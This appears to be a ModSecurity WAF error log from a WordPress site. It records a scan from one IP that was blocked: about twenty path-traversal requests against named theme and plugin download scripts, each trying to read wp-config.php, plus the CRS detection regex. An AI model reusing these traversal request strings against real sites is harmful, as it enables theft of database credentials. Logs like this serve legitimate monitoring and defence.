"(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/jamesaltucher/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/jamesaltucher/download.php"] [unique_id "Y8DxGY6vAq65Ygpdg5ObQAAAAFM"] [Fri Jan 13 00:50:17.243000 2023] [:error] [pid 31476:tid 140315281311488] [client 185.206.224.212:42990] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/fluidracountry/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/fluidracountry/download.php"] [unique_id "Y8DxGaGMrWzzUVMdEhcL7QAAAMY"] [Fri Jan 13 00:50:17.366802 2023] [:error] [pid 31476:tid 140315222562560] [client 185.206.224.212:42992] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/responsive-visual/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/responsive-visual/includes/download.php"] [unique_id "Y8DxGaGMrWzzUVMdEhcL7gAAAM0"] [Fri Jan 13 00:50:17.481561 2023] [:error] [pid 31041:tid 140315197384448] [client 185.206.224.212:42994] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/quark/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/quark/download.php"] [unique_id "Y8DxGcPRCDYHCWWhHpAjtAAAABA"] [Fri Jan 13 00:50:17.609633 2023] [:error] [pid 31041:tid 140315289704192] [client 185.206.224.212:42996] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/todays/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/todays/download.php"] [unique_id "Y8DxGcPRCDYHCWWhHpAjtQAAAAU"] [Fri Jan 13 00:50:17.728480 2023] [:error] [pid 31042:tid 140315214169856] [client 185.206.224.212:42998] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/banftheme/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/banftheme/download.php"] [unique_id "Y8DxGY6vAq65Ygpdg5ObQQAAAE4"] [Fri Jan 13 00:50:17.854947 2023] [:error] [pid 31042:tid 140315138635520] [client 185.206.224.212:43000] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/placid/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/placid/download.php"] [unique_id "Y8DxGY6vAq65Ygpdg5ObQgAAAFc"] [Fri Jan 13 00:50:17.969651 2023] [:error] [pid 31476:tid 140315306489600] [client 185.206.224.212:43002] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/metz/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/metz/download.php"] [unique_id "Y8DxGaGMrWzzUVMdEhcL7wAAAMM"] [Fri Jan 13 00:50:18.084455 2023] [:error] [pid 31043:tid 140315230955264] [client 185.206.224.212:43004] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/caledobio/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/caledobio/framework/utilities/download/getfile.php"] [unique_id "Y8DxGsx9A9c0KkSpLadQFgAAAIw"] [Fri Jan 13 00:50:18.211255 2023] [:error] [pid 31043:tid 140315239347968] [client 185.206.224.212:43006] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mingle/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mingle/framework/utilities/download/getfile.php"] [unique_id "Y8DxGsx9A9c0KkSpLadQFwAAAIs"] [Fri Jan 13 00:50:18.326439 2023] [:error] [pid 31476:tid 140315214169856] [client 185.206.224.212:43008] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/accesspress-store/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/accesspress-store/download.php"] [unique_id "Y8DxGqGMrWzzUVMdEhcL8AAAAM4"] [Fri Jan 13 00:50:18.464910 2023] [:error] [pid 31043:tid 140315214169856] [client 185.206.224.212:43010] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/PlixPro/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/PlixPro/download.php"] [unique_id "Y8DxGsx9A9c0KkSpLadQGAAAAI4"] [Fri Jan 13 00:50:18.598748 2023] [:error] [pid 31043:tid 140315205777152] [client 185.206.224.212:43016] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/haarperfect/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/haarperfect/framework/utilities/download/getfile.php"] [unique_id "Y8DxGsx9A9c0KkSpLadQGwAAAI8"] [Fri Jan 13 00:50:18.714735 2023] [:error] [pid 31476:tid 140315138635520] [client 185.206.224.212:43020] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-admin/tools.php?page=backup_manager&download_backup_file=oldBackups%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/tools.php"] [unique_id "Y8DxGqGMrWzzUVMdEhcL8QAAANc"] [Fri Jan 13 00:50:20.199378 2023] [:error] [pid 31041:tid 140315272918784] [client 185.206.224.212:43024] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "Y8DxHMPRCDYHCWWhHpAjtgAAAAc"] [Fri Jan 13 00:50:20.315439 2023] [:error] [pid 31043:tid 140315180599040] [client 185.206.224.212:43026] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/download-zip-attachments/download.php?File=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/download-zip-attachments/download.php"] [unique_id "Y8DxHMx9A9c0KkSpLadQHAAAAJI"] [Fri Jan 13 00:50:21.920702 2023] [:error] [pid 31043:tid 140315298096896] [client 185.206.224.212:43034] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/3d-twitter-wall/proxy.php?url=file..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/3d-twitter-wall/proxy.php"] [unique_id "Y8DxHcx9A9c0KkSpLadQHgAAAIQ"] [Fri Jan 13 00:50:22.046516 2023] [:error] [pid 31476:tid 140315289704192] [client 185.206.224.212:43038] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-emaily/wp-emaily-zip-creation.php?filename=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-emaily/wp-emaily-zip-creation.php"] [unique_id "Y8DxHqGMrWzzUVMdEhcL9QAAAMU"] [Fri Jan 13 00:50:22.161495 2023] [:error] [pid 31476:tid 140315130242816] [client 185.206.224.212:43040] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/ungallery/source.php?pic=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/ungallery/source.php"] [unique_id "Y8DxHqGMrWzzUVMdEhcL9gAAANg"] [Fri Jan 13 00:50:22.283696 2023] [:error] [pid 31476:tid 140315155420928] [client 185.206.224.212:43042] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/flash-album-gallery/facebook.php?i=1&f=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/flash-album-gallery/facebook.php"] [unique_id "Y8DxHqGMrWzzUVMdEhcL9wAAANU"] [Fri Jan 13 00:50:22.406686 2023] [:error] [pid 31476:tid 140315188991744] [client 185.206.224.212:43044] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/section-widget/themes/theme-loader.php?theme=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/section-widget/themes/theme-loader.php"] [unique_id "Y8DxHqGMrWzzUVMdEhcL-AAAANE"] [Fri Jan 13 00:50:22.522012 2023] [:error] [pid 31476:tid 140315264526080] [client 185.206.224.212:43046] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/yourls-widget/yourls-widget-hook.php?api_url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/yourls-widget/yourls-widget-hook.php"] [unique_id "Y8DxHqGMrWzzUVMdEhcL-QAAAMg"] [Fri Jan 13 00:50:22.638282 2023] [:error] [pid 31476:tid 140315281311488] [client 185.206.224.212:43048] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] 